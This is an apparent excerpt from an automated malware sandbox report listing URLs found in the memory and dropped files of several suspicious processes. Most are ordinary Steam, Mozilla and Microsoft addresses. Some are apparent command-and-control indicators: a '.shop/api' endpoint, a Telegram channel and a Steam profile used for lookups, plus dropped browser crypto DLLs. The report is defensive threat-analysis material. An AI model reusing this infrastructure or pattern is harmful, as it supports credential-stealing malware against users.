                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
                Source: katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, DHIEHI.11.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, DHIEHI.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: explorer.exe, 00000001.00000000.1725399899.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                Source: explorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                Source: DHIEHI.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: https://mozilla.org0/
                Source: explorer.exe, 00000001.00000000.1725399899.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: explorer.exe, 00000001.00000000.1725399899.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/ho
                Source: 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                Source: katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: D818.exe, 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmp, D818.exe, 0000000A.00000002.2306037473.0000000004570000.00000004.00001000.00020000.00000000.sdmp, D818.exe, 0000000A.00000002.2305075541.0000000002560000.00000040.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.000000000095D000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.0000000000953000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2788838595.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 38F9.exe, 00000006.00000003.2032159873.0000000002CCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: DHDHCG.11.drString found in binary or memory: https://support.mozilla.org
                Source: DHDHCG.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 38F9.exe, 00000006.00000003.2069016777.0000000002D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: DHDHCG.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                Source: 38F9.exe, 00000006.00000003.2032159873.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032286413.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2470808473.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2460544444.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, KEGCBF.11.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: 38F9.exe, 00000006.00000003.2032286413.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, KEGCBF.11.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                Source: 38F9.exe, 00000006.00000003.2032159873.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032286413.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2470808473.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2460544444.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, KEGCBF.11.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: 38F9.exe, 00000006.00000003.2032286413.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, KEGCBF.11.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                Source: D818.exe, 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmp, D818.exe, 0000000A.00000002.2306037473.0000000004570000.00000004.00001000.00020000.00000000.sdmp, D818.exe, 0000000A.00000002.2305075541.0000000002560000.00000040.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2788838595.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2067577469.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/
                Source: 38F9.exe, 00000006.00000002.2347437523.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2031885108.000000000064B000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2084150195.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2031961773.0000000000666000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2211195414.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000002.2346667476.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/api
                Source: 38F9.exe, 00000006.00000002.2346667476.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/apiEs#
                Source: 38F9.exe, 00000006.00000003.2031885108.000000000064B000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2031961773.0000000000666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/apiQ
                Source: 38F9.exe, 00000006.00000003.2119605689.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2120009035.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/apicC
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/lV
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/rr
                Source: 38F9.exe, 00000006.00000003.2031885108.000000000064B000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2031961773.0000000000666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/y
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000001.00000000.1725399899.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                Source: explorer.exe, 00000001.00000000.1725399899.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, DHIEHI.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, DHIEHI.11.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: DHDHCG.11.drString found in binary or memory: https://www.mozilla.org
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/532
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/532exe
                Source: DHDHCG.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                Source: DHDHCG.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/xe
